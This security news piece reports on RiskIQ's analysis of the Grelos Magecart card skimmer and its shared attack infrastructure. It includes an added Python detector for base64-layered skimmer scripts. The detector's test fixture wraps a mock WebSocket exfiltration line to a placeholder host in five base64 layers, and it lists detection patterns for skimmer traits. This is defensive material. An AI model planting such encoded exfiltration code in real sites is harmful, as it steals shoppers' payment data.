Friday, January 15, 11:14

Skimmer Grelos shows the difficulty of detecting Magecart attacks

The discovery of a new skimmer variant, Grelos, reveals the difficulties of attributing and tracking the various Magecart campaigns.

On Wednesday, RiskIQ researchers described how the new Grelos skimmer shows "increased overlap" in Magecart infrastructure and groups: this malware, along with other skimmers, is now hosted on domain infrastructure shared by multiple groups or affiliates, which is tied through WHOIS registrations to known phishing campaigns and to the development of other malware, creating "associations" that are difficult to separate.

Magecart is an umbrella term for threat groups and campaigns that specialize in stealing payment card data from e-commerce sites.

Several years ago, well-known brands such as British Airways and Ticketmaster became the first major victims of this form of attack and since then, countless sites have fallen victim to the same technique.

The new version of the Grelos skimmer, malware that has been around since at least 2015 and is associated with Magecart Groups 1 and 2, resembles a separate strain described by researcher @AffableKraut in July. That variant is a WebSocket-based skimmer that uses base64 encoding to obfuscate its activity.

"We believe that this skimmer is not directly related to the activity of Group 1-2 from 2015-16, but instead it is a repetition of their code," says RiskIQ. "This version of the skimmer has a 'loader stage' and a 'skimmer stage', both of which are base64-encoded five times."

After a Magecart attack on Boom! Mobile, RiskIQ investigated the incident, in which the Fullz House group loaded malicious JavaScript onto the mobile network provider's site to harvest customer data.

The domains used in this attack led the team to a cookie and to related skimmer domains, including facebookapimanager[.]com and googleapimanager[.]com.

However, instead of finding the Fullz House skimmer, the researchers discovered a new skimmer variant, Grelos. This strain has a similar base64-encoded loader stage, but uses only a single layer of encoding, contains duplicate script tags and spelling mistakes, and includes a dictionary called "translate" that holds the phrases used by the fake payment forms the malware creates. WebSockets are still used for data exfiltration.
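The traits described above (a loader stage carrying a base64 blob, a skimmer stage wrapped in several base64 layers, a "translate" dictionary and WebSocket exfiltration) are all things a defender can look for in script content served by a storefront. The following is an added example, not code from RiskIQ or from the article: a small Python analyzer that peels nested base64 layers out of a script and reports which of those indicators appear at any layer. The sample loader it runs on is constructed inline for the demonstration (the inner text is an inert string, the `skimmer.invalid` host is a placeholder), and the regexes are heuristics chosen here, not signatures published by anyone.

```python
import base64
import binascii
import re

# Quoted string literals long enough to be worth trying as base64 (heuristic threshold).
B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{24,}={0,2})['"]""")

# Indicators taken from the traits the article describes; patterns are this example's own.
INDICATORS = {
    "websocket": re.compile(r"new\s+WebSocket\s*\(|wss?://", re.I),
    "translate_dict": re.compile(r"\btranslate\s*=\s*\{"),
    "atob_loader": re.compile(r"\batob\s*\("),
    "form_fields": re.compile(r"(card\s*number|cvv|expir)", re.I),
}


def try_decode(literal: str):
    """Strictly decode a base64 literal to UTF-8 text; return None if it is not base64 text."""
    try:
        return base64.b64decode(literal, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def unwrap(script: str, max_depth: int = 8):
    """Peel base64 layers. Each pass first treats the whole blob as base64 (a stage
    delivered as raw base64), then falls back to the first decodable quoted literal
    (a loader embedding its next stage). Returns (decoded_layers, innermost_text)."""
    layers = []
    current = script
    for _ in range(max_depth):
        decoded = None
        stripped = re.sub(r"\s+", "", current)
        if re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", stripped) and len(stripped) % 4 == 0:
            decoded = try_decode(stripped)
        if decoded is None:
            for m in B64_LITERAL.finditer(current):
                decoded = try_decode(m.group(1))
                if decoded is not None:
                    break
        if decoded is None:
            break  # nothing further to peel
        layers.append(decoded)
        current = decoded
    return layers, current


def analyze(script: str) -> dict:
    """Report how many base64 layers were peeled and which indicators match at any layer."""
    layers, innermost = unwrap(script)
    texts = [script] + layers
    hits = {name for text in texts for name, rx in INDICATORS.items() if rx.search(text)}
    return {"layers": len(layers), "indicators": sorted(hits), "innermost": innermost}


# --- constructed fixture: an inert skimmer-stage string wrapped in five base64 layers ---
INNER = (
    'var translate = {"card": "Card number", "cvv": "Security code"};\n'
    'var ws = new WebSocket("wss://skimmer.invalid/collect");\n'  # placeholder host
)


def build_sample_loader(inner: str = INNER, layers: int = 5) -> str:
    """Base64-encode `inner` `layers` times and embed the result in a minimal loader string."""
    blob = inner
    for _ in range(layers):
        blob = base64.b64encode(blob.encode("utf-8")).decode("ascii")
    return 'var s = atob("' + blob + '");'


SAMPLE_LOADER = build_sample_loader()
BENIGN_SCRIPT = 'document.title = "hello";'

if __name__ == "__main__":
    print(analyze(SAMPLE_LOADER)["layers"], analyze(SAMPLE_LOADER)["indicators"])
    print(analyze(BENIGN_SCRIPT)["layers"], analyze(BENIGN_SCRIPT)["indicators"])
```

Run against a page's inline and external scripts, a hit count of several indicators together with three or more peeled layers is a much stronger signal than any single pattern; the whole-blob and literal paths are separate because the article describes both delivery shapes (a stage that is itself base64, and a loader carrying the next stage as a string).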

RiskIQ has observed several new Magecart-related skimmer variants in recent years. The company says the Fullz House skimmer has been adopted by other hacking groups, which even use some of the same infrastructure, such as hosting providers, to host other skimmers, including Grelos, which also shares IP addresses with the Inter skimmer.

This, in turn, creates "murkiness" in tracking the activities of individual Magecart groups, many of which launch new attacks against e-commerce companies on a daily basis.



Teo Ehc